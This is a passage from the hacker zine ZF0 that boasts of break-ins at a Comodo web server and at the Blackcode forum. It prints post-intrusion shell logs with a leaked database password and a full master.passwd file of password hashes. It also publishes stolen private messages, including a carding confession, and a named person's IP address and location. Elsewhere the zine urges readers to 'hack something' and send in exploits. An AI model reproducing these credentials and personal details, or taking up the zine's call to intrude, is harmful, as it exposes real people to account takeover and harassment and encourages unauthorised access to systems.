? Sl 23:05 0:00 -/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d -/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start -apache 18996 0.0 0.0 8500 996 ? R 23:05 0:00 ps auxww -root 22627 0.0 0.9 161988 15664 ? Ss Apr15 0:05 -/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d -/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start -apache 29185 0.0 0.4 131608 7288 ? S Apr16 0:00 -/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d -/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start -root 29813 0.0 0.0 0 0 ? S< Apr16 0:00 [rpciod/0] -root 29815 0.0 0.0 0 0 ? S Apr16 0:00 [lockd] - -apache@tcfweb1 /var/www/outage $ lastlog | grep -v Never -root pts/0 tecra.home.gaima Thu Apr 17 20:24:34 +0100 2008 -nfrance pts/1 asteroid.comodo. Wed Jun 13 20:41:21 +0100 2007 - -apache@tcfweb1 /var/www $ ls -al /home -total 1 -drwxr-xr-x 8 root root 224 Oct 25 13:26 . -drwxr-xr-x 22 root root 568 Oct 9 2007 .. --rw-r--r-- 1 root root 0 Feb 7 2006 .keep -drwx---r-x 4 ddanks users 216 Oct 25 13:26 ddanks -drwxr-xr-x 2 root ftp 48 Mar 26 2007 ftp -drwxr-xr-x 5 infra users 376 Mar 19 2007 infra -drwx---r-x 3 mwilliams users 160 Dec 18 2006 mwilliams -drwx---r-x 3 nfrance users 192 Mar 13 2007 nfrance -drwx---r-x 3 ralden users 160 Dec 18 2006 ralden - -apache@tcfweb1 /var/www $ cat /var/www/melih.com/htdocs/wp-config.php # what -CEO doesn't have WP these days -// ** MySQL settings ** // -define('DB_NAME', 'wordpress'); // The name of the database -define('DB_USER', 'wordpress'); // Your MySQL username -define('DB_PASSWORD', 'd4t4b4s3'); // ...and password # Whitehats have bought -the trademark rights for l33t sp33k passwds - # Never use l33t sp33k passwds unless you want -to be sued for copyright infringement -define('DB_HOST', 'csql'); // 99% chance you won't need to change this value -define('DB_CHARSET', 'utf8'); -define('DB_COLLATE', ''); -$ - -~~~~~~~~~~~~~~~~~~~~~~~ - -Comodo CA Limited - -http://www.comodo.com/ - -Tested: 06-May 2008 17:02:01 GMT - -This site is tested daily using Comodo's HackerProof Vulnerability Scanning -Service. The service performs an extensive range of tests to insure there are -no holes or weaknesses on this sites server. This trusted site seal is only -presented after the site has been deemed secure. You can conduct business with -this site knowing that the site owner has taken every precaution to protect -their site from intruders. - -Comodo's HackerProof Vulnerability Scanning Service is enhanced daily to insure -up to date vulnerability tests against the latest security threats. -Company Name: Comodo CA Limited -Company Address: 3rd Floor, Building 26 Office Village, Exchange Quay -Trafford road Salford, Greater Manchester, M5 3EQ, United Kingdom - -~~~~~~~~~~~~~~~~~~~~~~~ - -Time for a recall, HackerProof is HackerPwned. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Call For 0wning zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -== Call For 0wning == - -Yippie kayay motherfucker! - -== Results == - -Once again we brought in the own. This time we had contributions. Two very -public groups provided some good owns/starts early after the ZF03 publication. -We eventually had to re-own on both cases but that was our fault for sitting on -them. We forgot to ask if they wanted credit or not. They probably do but -assumptions suck. I guess if they want it they can claim it and we will confirm -(or deny if some loser group poses) in ZF05 or on FD. - -As well, one unassociated individual did fantastic work nearer to publication. - -Good work to all of you! We really do appreciate the help and take it into -consideration very seriously when judging or contemplating owning or helping -someone. Great to get some help and good to know someone actually reads this. -:p - -== Next Target == - -Sorry. There is no target this time. There are a lot of reasons, but the short -of it is that there is nothing that really grinds us collectively right now. -We're also, individually, venturing into different hacking interests and -hacking side projects. This also means that the owns might be a little -different or more diverse in the next zine. We'll probably need a lot of -relaxing time before we can sit down together and go after a broad target. - -== Options == - -What should you do with your time, now that your CF0 target has not -materialised? Hack something! Don't talk about it, do it! And don't be like -g00ns, scanning for a set of shitty public RFI vulns and owning stupid websites -run by people who know nothing about technology. At least, not if you are doing -that just to support your hacker ego. There are good uses for random sites, but -if you don't have those reasons then just work on something productive. - -Try to challenge yourself, go after stuff a little more complicated than -before. Occasionally we see really sweet hacks happening, and we love it. - -That's just our advice, don't take it too seriously. It's your life. Just -remember that it is what you make it. - -== Before You Go... == - -That doesn't mean you can't send us stuff. We accept hack logs, articles, -accounts, warez, exploits, stories, tributes, etc. If we get truly something -awesome we could always publish it in ZF05 if you wanted and it was exclusive. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Blackcode zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - -"Four thousand holes in blackburn, lancashire - And though the holes were rather small - They had to count them all" - - John "Spiderman" Lennon - -Oh blackcode, between Milamber (see ZF03) representing your skillset and tripple -representing your mouth how could we not own you? Its just a shame I didn't save - a certain thread in which r0xt3hwhatevers0x claimed the reason blackcode had -not been owned was because it was impossible! - -A little background: We saw Mil make a post on Blackcode saying it was just a -couple accounts and his owning wasn't that bad. So for laughs we logged in as -him and posted our rebuttal. Tripple freaked out. Mil doesn't like changing -passes, even if we've displayed them in cleartext in multiple zines. The truth -is that he likes to be published because it gives him attention that he could -not dream about getting otherwise. That's ZF0's expert psychologist dropping his -analysis. - -No Mil, we do NOT have room for you to have your own article in ZF04. Now fuck -off! - -So blackcode is another one of those kiddie breeding grounds. It seems these -days newbs either end up idling in 4chan or joining elitehackers/blackcode. -Blackcode have long been allied with tripple who probably openly admits to being - the biggest bastard on the internet, and to his credit, he does keep most of -blackcode's legions of kiddie drones in check. His skills as a Scottish -bastard (fact) aren't in question but his computer skills certainly are. He has -nothing to back up his rants when the big boys come to town. He pretty much -talked blackcode into being owned by defending his fellow lame friend Milamber. - Tripple has achived nothing in five years at blackcode. He has achieved nothing -but lived out the stereotypical scotsman's life. The problem is he is too soft - to do it irl - he prefers the internet! And on the internet you need skills. - -Firstly, let's take a look at some "private messages". (BTW, don't miss -tripple's "carding history" PM, it's gold) - -tripple -> iadnah -Not sure who it is yet as I aint spoken to Mil. This site is not a target so no -need to worry about that. - -## -# Yes tripple, because you issuing an open challenge for us to own you does not -# make you or the site you mod for a target :/ idiot. -## - -lloth -> iadnah -Could you upload it somewhere below the public_html in my account on this -server? - -As long as we get the admin passwords, we'll be fine. Then I'll dump the new -database and pass that along to you. Then let the fun commence. Razz - -I'm hoping that some of the people overlap other forums. - -## -# Oh how fun, Blackcode backdoor their own forum in a vain attempt to actually -# hack! -## - -r0x t3h s0x -> iadnah -Not saying anything to tripple Razz He has no reason to be pissed about me -gaining admin. He'd only be pissed because of another tiff that had come up in -IRC (you've probably seen it on the boards) - -Would just like to clarify that I had no malicious intentions when gaining the -powaz. It just started as a probe (first script was a "hello world") and then -became "can I open files with this?" and eventually "can I connect to MySQL -with this?" and then fo` shits 'n' giggles I made myself admin. Didn't actually -use the admin powers.. except for when I locked that thread in the tutorials forum. - -Aaanyway.. I'll speak to X and see where he stands. - -## -# Lolz, hacked by one of their own mods. Sounds like eleet 0day techniquez too. -# :/ -## - -tripple -> iadnah -2 users of this site were arrested and computers were confiscated also. I think -its best that we keep a very close eye on the forums for now as no doubt they -will be getting visits from law enforcement agencies. I spoke to X about it and -he seems to agree. - -I cant names the members mate as much as i would like to tell you but i have -given my word so ill let them fill anyone in if they choose to. - -I seen the post about IRC also mate, that will give people something to do -again. - -Hows shit going now anyway? - -## -# FUCK!!! RAIDED!!!!! -## - -tripple->iadnah -I think him hosting the IRC could be a problem mate, I am pretty sure that -would still be classed as associating with known criminals, even though neither -of them have been to trial yet. - -Thats fucked about moving your stuff etc. I could send you about $100, it aint -much but it will help. - -I aint really ben up t much, just trying to keep my nose clean. - -Saved the number in my phone so you never know, I might call one night but -beware the accent - -## -# Tripple still didn't pay up for Iadnah's "services" -## - -tripple->iadnah -Cool Ill call sometime in the next week or so then mate as Im working lates all -this week, reconsider the offer though as I know what its like to struggle and -dont let pride get in the way of this ok, we have known each other a long time -now and I would hate to think that pride would get between us - -## -# Phone sex -## - -tripple->iadnah -I dont really have time these days to be honest mate, I got way to much on the -go right now. Got a few court cases coming up also so trying to keep focused on -them rather than anythig else. - -## -# Tripple curb crawls hoes -## - -tripple->iadnah -That kinda info is the exact kinda info that would net you a serious amount of -cash if it fell into the right hands BUT also a serious amount of time should -the law know about it mate. - -The fact that you have teachers addresses, SS# and I will assume their ages, is -something that credit card scammers would love to have. - -I had a scam going in a previous job where I would sell CC details to people -that could clone cards and im sure you can imagine what they did once they had -the cards. - -If the daetails were to fall into the hands of someone like that then they -would pay quite well for it, provided it was enough info, when my case went to -court they estimated that I made around £135,000 by selling the details alone -and that the people I sold them to made over 2 million from it, so im sure you -can imagine how much these type of people would like the info provided that -their is enough info there. - -## -# HAHAHAHA. Tripple you bellend. I hope you are in jail right now. Carding, -# who'd have thought ey? The loud mouth cocky prick of Blackcode. -## - -tripple->iadnagh -I already new those types of people mate due to the circles I mixed in before I -met my ex and had a kid, you might wanna try any local drug dealer, while they -wont be of direct use to them (unless they have the facilities) they quite -possibly could put you in touch with someone, do use the kiddie dealers though -and be very carefull exactly what information you tell them you have. - -## -# Boy does this guy get around, drug dealing. You bad man tripple. lulz. -## - -iadnah->random -You should be careful about making comments like this one: - -jaber89 wrote on Wed, 22 August 2007 23:31 - -So you criticize people about posting anonymously on forums and what not. Are -you not the exact thing you taunt? and if you are not afraid of saying who you -are i would enjoy the following information. - -Your name: -Your Ip Adress: -Your current OS: - - -Your Name: James Showe -Your IP: 67.9.137.246 -OS: Windows XP SP2 or maybe Media Center -Browser: Firefox 2.0.0.6 - -You live somewhere in Texas, I'm guessing near Austin. - -Now, don't take this as a threat or anything. I'm really not an asshole, unlike -some people online are. I'm just trying to illustrate that unless you have the -skills and forethought to protect yourself you shouldn't say things like that -to people who tend to take it personally. - -You're right about the anonymous thing from your perspective, but what tripple -is referring to is a little different. He's saying that the zf0 people are -being -anonymous in that they won't even leave anything like a handle or screen name, -so nobody really knows who they are. You have a valid point though. - -## -# Iadnah bullying his members! :0 -## - -lloth->iadnah -Not sure if you saw it yet, but ZF0 3 is out. - -http://milw0rm.com/papers/175 - -That, and (which is referring to the zf0) - -http://blackcode.com/forum/index.php?t=msg&th=2128&s tart=0#msg_15399 - -Makes me think that we might be attacked next. - -It might be a good idea to give the security of the site a bit of a tune up, -just in case. - -Tell me what you think. If you need help with anything, just drop me a line. - -## -# That Lloth kid is pretty smart, totally put 2+2 together there. So here you -# are Lloth, see logs below :) -## - - logs - -$ uname -a; id -OpenBSD blackcode.com 4.1 GENERIC#1435 i386 -uid=1006(bc) gid=1005(bc) groups=1005(bc), 10(users), 1003(bcstaff)##sweet -group -$ cat /etc/master.passwd -root:$2a$08$6p2m7dDwgH14KMDghscHee0iU8ZGN0kIU5qRLH1o8/EhAAEGYcowK:0:0:daemon:0: -0:Charlie -&:/root:/usr/local/bin/bash -daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin -operator:*:2:5::0:0:System &:/operator:/sbin/nologin -bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin -smmsp:*:25:25::0:0:Sendmail Message Submission -Program:/nonexistent:/sbin/nologin -popa3d:*:26:26::0:0:POP3 Server:/var/empty:/sbin/nologin -sshd:*:27:27::0:0:sshd privsep:/var/empty:/sbin/nologin -_portmap:*:28:28::0:0:portmap:/var/empty:/sbin/nologin -_identd:*:29:29::0:0:identd:/var/empty:/sbin/nologin -_rstatd:*:30:30::0:0:rpc.rstatd:/var/empty:/sbin/nologin -_rusersd:*:32:32::0:0:rpc.rusersd:/var/empty:/sbin/nologin -_fingerd:*:33:33::0:0:fingerd:/var/empty:/sbin/nologin -_x11:*:35:35::0:0:X Server:/var/empty:/sbin/nologin -_kdc:*:59:59::0:0:Kerberos Server:/var/empty:/sbin/nologin -_kadmin:*:60:60::0:0:Kerberos Admin Server:/var/empty:/sbin/nologin -_spamd:*:62:62::0:0:Spam Daemon:/var/empty:/sbin/nologin -uucp:*:66:1::0:0:UNIX-to-UNIX -Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico -www:*:67:67::0:0:HTTP Server:/var/www:/sbin/nologin -_isakmpd:*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin -named:*:70:70::0:0:BIND Name Service Daemon:/var/named:/sbin/nologin -proxy:*:71:71::0:0:Proxy Services:/nonexistent:/sbin/nologin -_syslogd:*:73:73::0:0:Syslog Daemon:/var/empty:/sbin/nologin -_pflogd:*:74:74::0:0:pflogd privsep:/var/empty:/sbin/nologin -_bgpd:*:75:75::0:0:BGP Daemon:/var/empty:/sbin/nologin -_tcpdump:*:76:76::0:0:tcpdump privsep:/var/empty:/sbin/nologin -_dhcp:*:77:77::0:0:DHCP programs:/var/empty:/sbin/nologin -_mopd:*:78:78::0:0:MOP Daemon:/var/empty:/sbin/nologin -_tftpd:*:79:79::0:0:TFTP Daemon:/var/empty:/sbin/nologin -_rbootd:*:80:80::0:0:rbootd Daemon:/var/empty:/sbin/nologin -_afs:*:81:81::0:0:afs Daemon:/var/empty:/sbin/nologin -_ppp:*:82:82::0:0:PPP utilities:/var/empty:/sbin/nologin -_ntp:*:83:83::0:0:NTP Daemon:/var/empty:/sbin/nologin -_ftp:*:84:84::0:0:FTP Daemon:/var/empty:/sbin/nologin -_ospfd:*:85:85::0:0:OSPF Daemon:/var/empty:/sbin/nologin -_hostapd:*:86:86::0:0:HostAP Daemon:/var/empty:/sbin/nologin -nobody:*:32767:32767::0:0:Unprivileged user:/nonexistent:/sbin/nologin -ltnoc:$2a$06$c1ka/tKmx1lji1Qe9moM6uF0yk4nXiYd0P/3aMBzAzzbhIJlbCFCC:1000:10::0:0 -::/home/ltnoc:/bin/ksh -matsuura:$2a$06$1Grd0jbadQPF.2ZlRJqRKOwPZ6AokCCo3K6JHjEO1d5ROELcKWHee:1001:10:: -0:0::/home/matsuura:/bin/ksh -_vsftpd:*************:513:513:daemon:0:0:vsftpd user:/nonexistent:/sbin/nologin -eweng:$2a$06$YbPgN0dREwv4eSs4lg0yVeP6MyiWT4k8Rd6uR5JXyuHmkao0Aasma:1002:1002::0 -:0:eweng:/var/www/users/eweng/:/usr/local/bin/bash -iadnah:$2a$06$BzzhGdq9SaGCmzW5njLf0uJ.Ewf/GoAnv6xlcE6rbvjRtiJCkQKwa:1004:1001:s -taff:0:0::/home/iadnah:/usr/local/bin/bash -apache:*************:1005:1004:daemon:0:0::/var/www/:/bin/ksh -bc:$2a$06$79dGKUbOFQ/x49StJq8IUO4bsqV//WqgQwlGlNeGVVuicJV24WWhm:1006:1005:defau -lt:0:0::/var/www/users/bc:/usr/local/bin/bash -x:$2a$06$CAIFZ/IOSi1CF70l22vYLOBG2Hbq3uXOML/MsTTuTQ3xBpVAm7iGq:1007:1006:staff: -0:0::/home/x:/usr/local/bin/bash -phox:$2a$06$n3puaTonf4leplsoMmclge0wt/iBSnKTnnH.FuX8Q8eaARJjr1rxG:1008:1007:sta -ff:0:0::/var/www/users/phox:/usr/local/bin/bash -mysql:*************:1003:1000:mysql:0:0::/usr/local/mysql:/bin/ksh -_mysql:*************:502:502:daemon:0:0:MySQL -Account:/nonexistent:/sbin/nologin -bcbot:$2a$08$Wt388ODR2kl/PA1v/YpHOOa.b0Xz.qKcr5IC2MkdzXNkWLwdNFUCK:1009:1009:da -emon:0:0::/var/www/users/bcbot:/bin/ksh -alias:*************:1010:1010::0:0::/var/qmail/alias:/bin/ksh -qmaild:*************:1011:1011::0:0::/var/qmail:/bin/ksh -qmaill:*************:1012:1010::0:0::/var/qmail:/bin/ksh -qmailp:*************:1013:1010::0:0::/var/qmail:/bin/ksh -qmailq:*************:1014:1011::0:0::/var/qmail:/bin/ksh -qmailr:*************:1015:1011::0:0::/var/qmail:/bin/ksh -qmails:*************:1016:1011::0:0::/var/qmail:/bin/ksh -vpopmail:*************:1017:1012:daemon:0:0::/var/www/users/vpopmail:/bin/ksh -_clamav:*************:539:539:daemon:0:0:Clam -AntiVirus:/nonexistent:/sbin/nologin -qscand:*************:1018:1013:daemon:0:0:Qmail-Scanner -Account:/home/qscand:/sbin/nologin -wiki:$2a$06$xJJO8SDgYUyWRkbaU6TS5uk8xoh2qF.BLWnK4UOMutSVLk89KOXvq:1019:1019::0: -0:wiki:/var/www/users/wiki:/usr/local/bin/bash -silcd:*************:1020:1014::0:0::/usr/local/silc:/bin/sh -logger:$2a$06$ccLfHNPSUo/Ou0mvYQ3EGuzqDXntiwZGtro1C68QXX4jVO9P82czK:1021:1015:: -0:0:logger:/home/logger:/usr/local/bin/bash -_snort:*************:557:557:daemon:0:0:Snort -Account:/nonexistent:/sbin/nologin -_scanlogd:*************:514:514::0:0:scanlogd:/nonexistent:/sbin/nologin -p_harrybotter:$2a$06$FQHFLRxMglaSrJd8z4kT3O4gsoizsjj6E3o74rzMA.hKefZ7XNs3u:1022 -:1022::0:0:p_harrybotter:/var/www/users/p_harrybotter:/usr/local/bin/bash -p_networkjack:$2a$06$f/SgXG6YpiXS0ub9HCjWCOCq.sQv3MvV1GMhjDlzsBHbDokeT9aRW:1023 -:1016::0:0::/var/www/users/p_networkjack:/bin/nologin -silcbot:$2a$08$b2BDFy2Ku8qvK73J7iMiwOxipgVZjcQa5U0pnGL/lP/Yu2lKQTkPK:1024:1024: -daemon:0:0:silcbot:/home/silcbot:/usr/local/bin/bash -lloth:$2a$06$G3QX/cno9IFcOHuEqD8D.ezIcmwyIa76gTELDqGZ4FRxYtdWE85qe:1025:1025:st -aff:0:0:Lloth:/home/lloth:/usr/local/bin/bash -origin:$2a$06$3Of08.Bj3rBsPGNRiGzELOAGeX9OQ6Bnd90h9l4sFjPO5HEu8lzd6:1026:1026:: -0:0:origin:/home/origin:/usr/local/bin/bash - -$ last -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Fri Apr 18 12:48 - 12:54 (00:05) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 16 12:16 - 12:19 (00:03) -iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 19:26 - 19:26 (00:00) -iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 19:25 - 19:26 (00:01) -iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 19:24 - 19:24 (00:00) -iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 19:22 - 19:23 (00:00) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 19:16 - 21:41 (02:25) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 19:03 - 19:08 (00:05) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 16:49 - 19:00 (02:10) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 15:12 - 18:02 (02:50) -bc ttyp3 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 15:08 - 17:19 (02:11) -bcbot ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 15 13:40 - 16:28 (02:47) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Sun Apr 13 03:15 - 05:28 (02:13) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Sat Apr 12 22:30 - 22:31 (00:01) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Sat Apr 12 15:14 - 18:59 (03:44) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 9 18:25 - 20:56 (02:31) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 9 14:01 - 17:13 (03:12) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 9 14:01 - 14:01 (00:00) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 8 20:14 - 22:47 (02:33) -bc ttyp3 cpe-71-79-136-31.neo.res.rr.com Tue Apr 8 18:15 - 20:26 (02:11) -bc ttyp3 cpe-71-79-136-31.neo.res.rr.com Tue Apr 8 18:14 - 18:14 (00:00) -bridge ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 8 16:52 - 19:05 (02:13) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Mon Apr 7 19:06 - 21:25 (02:19) -iadnah ttyp4 cpe-71-79-136-31.neo.res.rr.com Mon Apr 7 18:16 - 18:45 (00:29) -bc ttyp3 cpe-71-79-136-31.neo.res.rr.com Mon Apr 7 17:44 - 18:45 (01:01) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Mon Apr 7 16:24 - 18:42 (02:17) -bc ttyp3 cpe-71-79-136-31.neo.res.rr.com Mon Apr 7 12:14 - 15:07 (02:53) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Mon Apr 7 12:13 - 14:32 (02:19) -iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 23:11 - 02:07 (02:55) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 23:11 - 01:21 (02:10) -bc ttyp4 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 20:29 - 22:50 (02:21) -iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 17:56 - 21:44 (03:47) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 17:54 - 21:41 (03:47) -iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 16:52 - 16:59 (00:07) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 15:48 - 16:59 (01:10) -iadnah ttyp4 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 09:02 - 11:53 (02:51) -bc ttyp3 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 08:48 - 11:53 (03:05) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 07:54 - 10:40 (02:45) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 06:38 - 06:42 (00:04) -bc ttyp7 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 22:44 - 00:59 (02:15) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 21:31 - 22:54 (01:22) -bcbot ttyp0 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 21:08 - 23:19 (02:10) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 19:36 - 21:29 (01:53) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 16:38 - 19:45 (03:07) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 21:35 - 00:49 (03:13) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 18:11 - 21:50 (03:39) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 16:47 - 18:20 (01:32) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 14:30 - 16:46 (02:15) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 10:42 - 14:39 (03:57) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 06:51 - 10:50 (03:59) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 06:11 - 06:59 (00:47) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 05:18 - 06:20 (01:01) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 23:14 - 00:20 (01:06) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 20:13 - 21:52 (01:38) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 20:03 - 20:13 (00:10) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 19:04 - 20:11 (01:07) -iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 19:00 - 19:04 (00:04) -lloth ttyp0 pool-72-79-31-236.nwrknj.east.verizon.net Tue Apr 1 16:04 - 16:05 (00:00) -lloth ttyp0 pool-72-79-31-236.nwrknj.east.verizon.net Tue Apr 1 14:53 - 15:17 (00:23) -bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 03:43 - 07:18 (03:34) -bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 01:58 - 03:51 (01:53) - -wtmp begins Tue Apr 1 01:38 2008 -$ pwd -/var/www/users/bc -$ ls -la -total 41388 -drwxr-xr-x 11 bc bc 1024 Apr 9 18:43 . -drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. --rw------- 1 bc bc 10105 Apr 18 12:54 .bash_history --rw-r--r-- 1 bc bc 616 Jan 25 19:38 .bashrc --rw-r--r-- 1 bc bc 776 Mar 2 2006 .cshrc -drwxr-xr-x 2 bc bc 512 Aug 20 2007 .log --rw-r--r-- 1 bc bc 317 Mar 2 2006 .login --rw-r--r-- 1 bc bc 105 Mar 2 2006 .mailrc --rw------- 1 bc bc 16301 Apr 9 18:43 .mysql_history --rw-r--r-- 1 bc bc 616 Jan 25 19:39 .profile -drwx------ 2 bc bc 512 Aug 20 2007 .ssh --rw-r--r-- 1 bc bc 1808 Mar 26 17:48 72.29.82.80.log -drwxr-x--- 14 bc bc 512 Jan 28 10:50 FUDforum -drwxr-xr-x 2 bc bc 512 Apr 28 2007 ads -drwxr-xr-x 3 bc bc 512 Apr 15 18:02 bcincludes -drwxr-xr-x 2 bc bc 512 Apr 9 14:01 chat --rw-r--r-- 1 bc bc 239 Feb 11 19:40 filter.php --rw-r--r-- 1 bc bc 0 Nov 29 18:35 gparse.php --rw-r--r-- 1 root bc 344 Aug 18 2007 hash.php -drwxr-xr-x 2 bc bc 512 Mar 16 17:05 jobs --rw-r--r-- 1 bc bc 497 Sep 12 2007 log.php --rwxr-xr-x 1 bc bc 6551 Apr 6 18:06 nmap-runner --rw-r--r-- 1 bc bc 92 Apr 6 18:06 nmap-runner.c --rw-r--r-- 1 bc bc 369 Aug 9 2006 pleft.jpg -drwxr-xr-x 22 bc bc 2048 Apr 15 16:42 public_html --rw-r--r-- 1 bc bc 1890 Mar 16 16:58 scanjob.php --rw-r--r-- 1 bc bc 226 Jan 9 2007 search.php -drwxr-xr-x 2 bc bc 512 Apr 2 17:33 sql --rw-r--r-- 1 root bc 21073573 Nov 26 17:03 sql.html --rw-r--r-- 1 bc bc 33 Apr 2 17:46 sql_cache.php --rw-r--r-- 1 bc bc 1918 Feb 11 19:35 stop_words -$ cat .bash_history -nano bcincludes/defleft.php -nano bcincludes/defright.php -nano bcincludes/top.php -nano public_html/scripts/lib.js.php -nano public_html/scripts/app_panel.js.php -nano public_html/scripts/lib.js.php -nano public_html/apps/ntools.php -man whois -nano public_html/tools.php -nano public_html/toolbox2.php -nano public_html/subjob.php -whois =google.com -whois =google.com | less -man whois -whois help -whois domain google.com -whois domain.google.com -whois help -whois help | less -whois 'domain google.com' -whois 'domain google.com' | less -nano bcincludes/main.php -nano public_html/apps/ntools.php -nano public_html/apps/ntools.php -nano bcincludes/top.php -cd public_html/ -cd themes/bc/ -nano main.css -nano ../../../bcincludes/top.php -nano ../../../bcincludes/main.php -nano ../../../bcincludes/top.php -ls -cd -cd FUDforum/ -ls -nano fud_src/ -ls scripts/ -grep {FULL_ROOT} * -grep -r {FULL_ROOT} * -grep -r {FULL_ROOT} src/ -grep -r {FULL_ROOT} src/ | less -grep -r FULL_ROOT src/ | less -grep -r FULL_ROOT src/ | less | grep 0v header -grep -r FULL_ROOT src/ | less | grep -v header -nano include/core.inc -ls -grep -r FULL_ROOT include/ | less | grep -v header -nano include/compiler.inc -grep -r FULL_ROOT include/ | less | grep -v header -grep -r FULL_ROOT thm/BC/ | less | grep -v header -grep -r FULL_ROOT thm/BC/tmpl/ | less | grep -v header -nano include/compiler.inc -cd -nano bcincludes/top.php -nano bcincludes/defleft.php -nano bcincludes/top.php -nano bcincludes/main.php -nano bcincludes/defleft.php -nano bcincludes/main.php -nano FUDforum/thm/BC/tmpl/footer.tmpl -nano FUDforum/thm/BC/tmpl/header.tmp -nano public_html/scripts/lib.js.php -nano public_html/themes/bc/main.css -nano public_html/scripts/lib.js.php -nano public_html/apps.php -cd FUDforum/ -cd thm/BC/ -nano foum -nano tmpl/forum.css.tmpl -tail /var/www/logs/error_log 